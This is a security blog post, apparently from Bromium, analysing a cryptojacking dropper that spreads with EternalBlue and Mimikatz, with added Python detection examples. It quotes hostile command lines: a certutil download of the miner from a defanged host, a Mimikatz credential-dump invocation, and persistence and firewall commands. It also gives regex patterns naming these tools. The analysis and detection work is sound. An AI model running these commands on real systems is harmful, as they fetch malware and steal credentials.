- We analyse a cryptojacking attack that mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. The rebound of the cryptocurrencies market means that cryptojacking is an increasingly profitable activity for criminals.
- The use of freely-available exploits such as EternalBlue and DoublePulsar shows how exploits that were previously only available to nation state actors are gradually adopted by less sophisticated cybercrime players.
- The use of Mimikatz, masscan and WinPcap also raises questions about the aims of the attackers beyond simply distributing coin mining malware.
- Historically, coin mining malware has been regarded as a low severity threat, but attacks such as this demonstrate how this threat category has become more nefarious. Coin miners have started using techniques used by banking Trojans to evade detection, such as living-off-the-land binaries (LOLBins) for code execution, parent process ID (PPID) spoofing, and hiding files and payloads after execution to remain discreet.
The early adopters of cryptocurrencies like Bitcoin, Ethereum and Litecoin were privacy-conscious individuals and currency enthusiasts. Over time, however, the inherent pseudonymous properties of cryptocurrencies have attracted people with less noble intentions – those who wish to reduce the traceability of financial transactions associated with criminal activities.
One of the fundamental requirements for cryptocurrencies is to verify the accuracy of each transaction’s details to ensure transactions remain secure and trustworthy. There is no concept of a managing authority in cryptocurrencies, and the job of verification is performed by a community of global users, often referred to as “miners”. The transaction details of cryptocurrencies like Bitcoin are publicly available. A collection of transaction records forms a unit called a “block”. After a transaction is verified, each block is assigned a unique code called a “hash” and the complete transaction record is compiled to form a blockchain ledger. The process of verifying and adding the transaction details back into the blockchain requires solving complex and computationally intense hashing problems. In exchange for solving these problems, miners are awarded a certain amount of cryptocurrency.
Solving the hashing problem takes substantial computing power, but can be sped up by using GPUs and specialist hardware called an ASIC (Application-Specific Integrated Circuit). ASICs are extremely costly and require considerable cooling effort, resulting in astronomical electricity bills for their owners. Without a doubt, cryptocurrency mining is a costly enterprise.
Attackers have also started using post-exploitation tools, enabling them to infect multiple computers by moving laterally within the compromised network. Cryptojacking activity tends to follow the value of cryptocurrencies. As the value of cryptocurrencies increases, cryptojacking becomes an increasingly profitable activity for criminals. It also has benefits over other means of generating revenue, such as ransomware:
- Ransomware is typically a one-time activity, and most enterprises don’t honour demands for the ransom.
- Ransomware attacks attract the attention of law enforcement agencies.
- If third-party ransomware is used, developers typically take a cut of any ransom money that is paid.
- Developing ransomware requires more skill than developing a coin miner.
- Detecting a coin miner is difficult compared to most malware because mining software can be used legitimately.
- Once a coin miner is deployed, an actor can monetise the infected host for as long as the host is online.
Recently we came across a URL delivering coin mining malware. The payload was isolated by Bromium Secure Platform and provided a lot of data for understanding how the attack works. In this blog post, we analyse its behaviour and how it uses a suite of post-exploitation tools, including EternalBlue, to extend the intrusion into the victim’s network. This wasn’t your typical coin mining malware.
The malware mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. This appreciation is one possible reason why cryptojacking attacks are increasingly attractive to attackers. Monero, in particular, is favoured by criminal actors because it is less resource intensive to mine since it does not require an ASIC, unlike other cryptocurrencies. Ultimately, this means that attackers can target low-powered devices and still turn a profit.
- Main dropper
- Filename: download.exe
- Size: 90 KB (92160 bytes)
- MD5: 0fe77bc5e76660ad45379204aa4d013c
- SHA1: 189D75F6485B7F220B143C0DD548D97BD7D81E3F
- SHA256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
This portable executable (PE) file is delivered through a URL. Looking at the sections of the file in PEStudio suggests that it was packed using UPX, an open source packer.
When run, download.exe unpacks itself and copies the unpacked file to “C:\WebKitsSdk\2.7.92” with the name ophgsf.exe.
The newly written file is then run as a child process of download.exe.
The process then copies itself to C:\Windows\SysWOW64 with the name tgvbgq.exe and marks it as a hidden file.
To make the malware persistent on the system, ophgsf.exe creates and launches a new service called Abcdef whose BinaryPath points to C:\Windows\System32\tgvbgq.exe. Because the CreateService API is called from a 32-bit process, the service’s configuration is marked as WOW64. When ophgsf.exe calls the StartService API to launch the binary registered for the service, Wow64 file system redirection causes the binary to be launched from the C:\Windows\SysWOW64 directory rather than from the C:\Windows\System32\tgvbgq.exe path given in the binary path. The service is granted the following rights through the DesiredAccess parameter value (0xF0137):
Figure 6 – Service creation to establish persistence.
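The following is an added example, not code from the original post: it decodes the DesiredAccess value 0xF0137 into the named service rights (constants from winnt.h and winsvc.h) and resolves which on-disk file a WOW64-marked service actually starts, as described above.

```python
# Added example, not code from the original post: decode the DesiredAccess mask
# 0xF0137 that ophgsf.exe passes to CreateService, and resolve which on-disk file a
# WOW64-marked service starts. Constant values are taken from winnt.h / winsvc.h.
from __future__ import annotations

STANDARD_RIGHTS = {             # winnt.h, the 0xF0000 part of the mask
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
}
SERVICE_RIGHTS = {              # winsvc.h service-specific rights
    0x0001: "SERVICE_QUERY_CONFIG",
    0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS",
    0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START",
    0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE",
    0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
ALL_RIGHTS = {**STANDARD_RIGHTS, **SERVICE_RIGHTS}
SERVICE_ALL_ACCESS = 0xF01FF    # winsvc.h


def decode_service_access(mask: int) -> list[str]:
    """Name every right set in a service access mask; unknown bits are reported, not dropped."""
    names = [name for bit, name in ALL_RIGHTS.items() if mask & bit]
    leftover = mask & ~sum(ALL_RIGHTS)          # bits outside the known tables
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:X})")
    return names


def rights_not_requested(mask: int) -> list[str]:
    """Service rights in SERVICE_ALL_ACCESS that the mask leaves out (0xF0137 is less than all access)."""
    return [name for bit, name in SERVICE_RIGHTS.items() if (SERVICE_ALL_ACCESS & bit) and not (mask & bit)]


def launched_path(binary_path: str, wow64_service: bool) -> str:
    """Path actually started: for a WOW64 service, System32 in BinaryPath is redirected to SysWOW64."""
    prefix = "c:\\windows\\system32\\"
    if wow64_service and binary_path.lower().startswith(prefix):
        return "C:\\Windows\\SysWOW64\\" + binary_path[len(prefix):]
    return binary_path


if __name__ == "__main__":
    print(decode_service_access(0xF0137))
    print(rights_not_requested(0xF0137))
    print(launched_path("C:\\Windows\\System32\\tgvbgq.exe", wow64_service=True))
```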
Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection and second, upon the start of the service, the binary is always executed even though it is not a valid service executable. After starting the service, ophgsf.exe copies itself from C:\WebKitsSdk\2.7.92 to C:\Windows\SysWOW64 as “126860.bak” and then terminates itself.
A PE file called SunloglicySrv.exe is downloaded and run by download.exe from the URL hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and saved to C:\WebKitsSdk\2.7.92\. Bromium Cloud Service classifies this threat as Win32.Trojan.Miner.
After starting the coin miner process (SunloglicySrv.exe), download.exe then launches the certutil tool using command prompt (cmd.exe). Certutil is a Windows built-in tool used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally:
certutil.exe -urlcache -split -f [URL] DestinationFile
In this case, the provided URL is hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and the destination file is %SystemRoot%\Temp\SunloglicySrv.exe.
We see certutil being frequently misused as a LOLBin by malicious actors. One of the reasons why malware authors prefer to download a payload using certutil is that using a signed Microsoft tool is less likely to be detected than using third-party programs. If the download using certutil was successful, cmd.exe runs the file. We found that the file (SunloglicySrv.exe) was the same coin miner that was downloaded and launched earlier by download.exe.
Afterwards, download.exe moves itself to the directory “%TEMP%\127172\….\” and saves the file with the name “TemporaryFile”. It then renames the directory “….” to “%TEMP%\127172\”. The reason for copying a file and then renaming a directory in this way is to break file tracking. The Windows file system doesn’t provide callbacks for files within the directory during a directory rename operation, so this technique allows malware authors to bypass tracking of their binary by security solutions and makes the job of an auditor a whole lot harder. Finally, download.exe ends its process.
The coin miner process is launched from C:\WebKitsSdk\2.7.92 and copies itself to C:\Windows\ugrpkute with the name tpcunli.exe. Once a copy is created, it follows the same technique of breaking file tracking by moving the file from C:\WebKitsSdk\2.7.92 to C:\Users\bruser1729\AppData\Local\Temp\127437\….\ using the file name “TemporaryFile”, before renaming the directory to C:\Users\bruser1729\AppData\Local\Temp\127437\.
- Filename: tpcunli.exe
- File Path: C:\Windows\ugrpkute
- SHA256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81
- Bromium Cloud Service classification: Win32.Trojan.Mbt
The process then runs tpcunli.exe from cmd.exe using the start command. It joins the command with a ping command that delays the launch of the program by five seconds. This is a common way to delay the execution of commands. After running the command, SunloglicySrv.exe ends its process.
cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\tpcunli.exe
The process begins by modifying itself with another payload. Afterwards, it creates a service called “plikeztuc” where BinaryPath points to C:\Windows\ugrpkute\tpcunli.exe and the DesiredAccess is 0xF0137. After creating the service, it ends its process.
- Filename: tpcunli.exe
- File Path: C:\Windows\ugrpkute
- SHA256: 69481183822cbc5972843308746f1b32426c68375acd82ebe84f04930a4800ef
- Bromium Cloud Service classification: Win32.Trojan.Mbt
The process runs the cacls tool, which is used to modify access control lists (ACLs). Specifically, it removes the permissions of the Users and Administrators groups and the SYSTEM account to access the /etc/hosts file.
The process also hides the current user’s Internet history and cookie files by changing their file properties and placing desktop.ini files in each subdirectory.
Next, it runs netsh commands to block incoming Server Message Block (SMB) traffic. The commands resemble those used by WannaCry, which exploited an SMB version 1 vulnerability and applied similar IPSec policies to block TCP port 445.
Figure 16 – Netsh commands to apply IPSec policy to block incoming SMB traffic.
The process drops various publicly available tools and exploits, such as those exposed by The Shadow Brokers in 2017. These tools were developed by the National Security Agency’s Equation Group and have been used by several malware authors, including the creators of WannaCry.
- DoublePulsar backdoor
- Exploit based on CVE-2017-8464
Next, tpcunli.exe installs WinPcap version 4.1.3 using the silent mode flag (“/S”). The properties of this file show that it was taken from the installer of a product called BMC TrueSight.
The WinPcap installer attempts to stop the services of BMC TrueSight and restarts the Netgroup Packet Filter (NPF) driver.
Tpcunli.exe runs masscan (bgichmvs.exe) through cmd.exe and uses it to scan for open ports across public IP ranges. Because masscan depends on the WinPcap driver (npf.sys), this likely explains why WinPcap was installed.
Next, tpcunli.exe writes a list of hardcoded public IP address ranges to a file called ip.txt. Afterwards it launches masscan and provides the list of IP ranges as input to scan for open TCP port 7001 at a rate of 4096 packets per second, writing its output in JSON format. We believe it does so to find exposed Oracle WebLogic servers listening on port 7001 that may be vulnerable to CVE-2017-10271.
Next, tpcunli.exe runs Mimikatz (vfshost.exe) to extract credentials from the lsass.exe (Local Security Authority Subsystem Service) process using its sekurlsa module. This module retrieves passwords in plain text, which can be used for further attacks such as the pass-the-hash technique. When run as Administrator, the command requires the debug privilege.
Tpcunli.exe copies itself to C:\Windows\IME using the file name masruql.exe. It then runs Windows Task Scheduler (schtasks.exe) to create two scheduled tasks. The first is called “qnsegabbm” which runs masruql.exe using the SYSTEM account and reoccurs every minute. The second is called “senutquec” which runs a command that modifies the user access rights of C:\Windows\ugrpkute\tpcunli.exe to allow everyone. This reoccurs every minute and uses the SYSTEM account.
Afterwards, tpcunli.exe drops another payload (enakii.exe) and its configuration file in C:\Windows\temp\zceliqcqn. The configuration file matches that used by XMRig, a free Monero coin miner, suggesting that the malware is based on that software.
- Filename: enakii.exe
- Location: C:\Windows\temp\zceliqcqn
- SHA256: 245dfbbdcee07be690fbed16eea528e2a0ed7ebd67c179515a479b0693810cc7
- Bromium Cloud Service classification: Win32.Trojan.Coinminer
After dropping the payload, a third scheduled task is created called “kqivnbrqa”. It modifies the user access rights of C:\Windows\TEMP\zceliqcqn\enakii.exe to allow everyone. This task is set to reoccur every minute and is run using the SYSTEM account.
Figure 29 – Third scheduled task.
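The living-off-the-land command lines described across this chain (certutil download, ping-delayed start, hosts-file ACL change, netsh IPSec policy, masscan run under a renamed binary, Mimikatz sekurlsa, every-minute SYSTEM scheduled tasks) share shapes that can be triaged from process-creation telemetry. The block below is an added example, not code from the original post: the certutil and ping/start lines are the ones quoted above, the other sample command lines are constructed to mirror the description, and the regexes are assumptions about invocation syntax rather than commands recovered from the sample.

```python
# Added example, not code from the original post: triage process command lines for the
# living-off-the-land patterns this attack chain uses. Sample lines are constructed to
# mirror the post; bgichmvs.exe (masscan) and vfshost.exe (Mimikatz) are names from the post.
from __future__ import annotations
import re

RULES = {
    "certutil_download": re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*-f\s+\S+", re.I),
    "ping_delay_then_start": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d+.*&\s*start\b", re.I),
    "schtasks_every_minute_system": re.compile(
        r"schtasks(\.exe)?\s+/create\b(?=.*/sc\s+minute\b)(?=.*/mo\s+1\b)(?=.*/ru\s+system\b)", re.I),
    "hosts_file_acl_change": re.compile(r"\b(cacls|icacls)(\.exe)?\b.*etc[\\/]hosts\b", re.I),
    "netsh_ipsec_block_445": re.compile(r"netsh\s+ipsec\b.*\b445\b", re.I),
    # masscan-style arguments, matched regardless of the (renamed) binary name
    "masscan_style_args": re.compile(r"^(?=.*-iL\s+\S+)(?=.*--rate\s+\d+)(?=.*-oJ\s+\S+)(?=.*-p\s*\d+)", re.I),
    "mimikatz_sekurlsa": re.compile(r"sekurlsa::", re.I),
}


def triage(cmdline: str) -> list[str]:
    """Return the sorted names of every rule that fires on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def triage_all(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each command line that fired at least one rule to its hits."""
    return {c: hits for c in cmdlines if (hits := triage(c))}


# Constructed sample command lines (first two are quoted in the post; the rest are assumptions)
SAMPLE_CMDLINES = [
    "cmd.exe /c certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe %SystemRoot%\\Temp\\SunloglicySrv.exe",
    "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\tpcunli.exe",
    "schtasks /create /tn qnsegabbm /tr C:\\Windows\\IME\\masruql.exe /sc minute /mo 1 /ru SYSTEM /f",
    "cacls C:\\Windows\\System32\\drivers\\etc\\hosts /e /r Users",
    "netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp",
    "bgichmvs.exe -iL ip.txt -p7001 --rate 4096 -oJ out.json",
    'vfshost.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
    "cmd.exe /c ipconfig /all",   # benign control line, should not fire
]

if __name__ == "__main__":
    for line, hits in triage_all(SAMPLE_CMDLINES).items():
        print(hits, line)
```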
Tpcunli.exe performs a PPID spoofing technique to launch the child process enakii.exe. Using PPID spoofing, it indirectly executes C:\Windows\TEMP\zceliqcqn\enakii.exe by launching enakii.exe as a child process of C:\Windows\System32\Spoolsv.exe.
One of the ways malware can perform PPID spoofing is to open a handle to the target parent process, call UpdateProcThreadAttribute to update the attribute list of the child process’s STARTUPINFOA structure, and set the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to the handle of the target parent process.
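Because process-creation telemetry records the parent the attacker chose, the spoofed parent is what an analyst sees; the detection opportunity is the implausible pairing of a service process and a child from a temp path. The block below is an added example, not code from the original post: a heuristic over constructed process-creation records (the fields Sysmon event 1 exposes), with the first record mirroring enakii.exe launched under Spoolsv.exe as described above.

```python
# Added example, not code from the original post: a heuristic over process-creation
# records for the shape PPID spoofing leaves behind, a service process "parenting" an
# executable from a temp directory. All records below are constructed.
from dataclasses import dataclass

# Processes that should not normally spawn arbitrary binaries from temp-style paths
SERVICE_PARENTS = {"spoolsv.exe", "services.exe", "lsass.exe", "winlogon.exe", "svchost.exe"}
SUSPECT_DIRS = ("c:\\windows\\temp\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")


@dataclass
class ProcCreate:
    pid: int
    image: str
    parent_pid: int
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_spoof_candidate(rec: ProcCreate) -> bool:
    """True when a service process appears to start a binary from a temp-style location.

    The recorded parent is whatever handle the creator passed as PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
    so the tell is the pairing itself, not the parent field alone."""
    parent = basename(rec.parent_image)
    image = rec.image.lower()
    return parent in SERVICE_PARENTS and any(d in image for d in SUSPECT_DIRS)


def find_spoof_candidates(records: list) -> list:
    return [r for r in records if is_spoof_candidate(r)]


# Constructed records: the first mirrors enakii.exe hung off Spoolsv.exe as described above
SAMPLE_RECORDS = [
    ProcCreate(4120, "C:\\Windows\\TEMP\\zceliqcqn\\enakii.exe", 1388, "C:\\Windows\\System32\\Spoolsv.exe"),
    ProcCreate(5016, "C:\\Windows\\System32\\taskhostw.exe", 900, "C:\\Windows\\System32\\svchost.exe"),
    ProcCreate(5200, "C:\\Windows\\TEMP\\setup_helper.exe", 3300, "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for rec in find_spoof_candidates(SAMPLE_RECORDS):
        print(f"pid {rec.pid}: {rec.image} under {rec.parent_image} (ppid {rec.parent_pid})")
```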
Tpcunli.exe also drops a tool (ouousbpro.exe) used to exploit CVE-2017-8464 by creating shortcut files (.LNK) for all non-existent drives. We believe it does this to spread to removable media and network drives.
If the process continues to run, it tries to exploit an existing vulnerability in the system to move laterally.
The graph below shows the chain of events captured in the micro VM, which includes the dropping of payloads, indirect execution of processes and high severity events triggered by known malware behavioural patterns.
Interesting Memory Strings – tpcunli.exe
In our analysis, we found that tpcunli.exe was very noisy and dropped all of the post-exploitation tools on the system. Additional memory strings were identified that hint at what else this malware does:
- List of common passwords
- List of file extensions
- List of domain names
- Commands to dump the process memory of certain processes using Procdump which are then fed into Mimikatz to extract credentials:
- Commands to disable the Windows Firewall, SharedAccess and Windows Defender services.
- Fetch a configuration file cfg.ini from the following URLs:
- Use the following domain strings to download the coin miner payload:
- Try to move laterally within the network using known credentials.
Indicators of Compromise (IOCs)
*** This is a Security Bloggers Network syndicated blog from Bromium authored by Ratnesh Pandey. Read the original post at: https://www.bromium.com/cryptojacking-coin-miner-attack-uses-nsa-developed-equation-group-tools-to-move-laterally/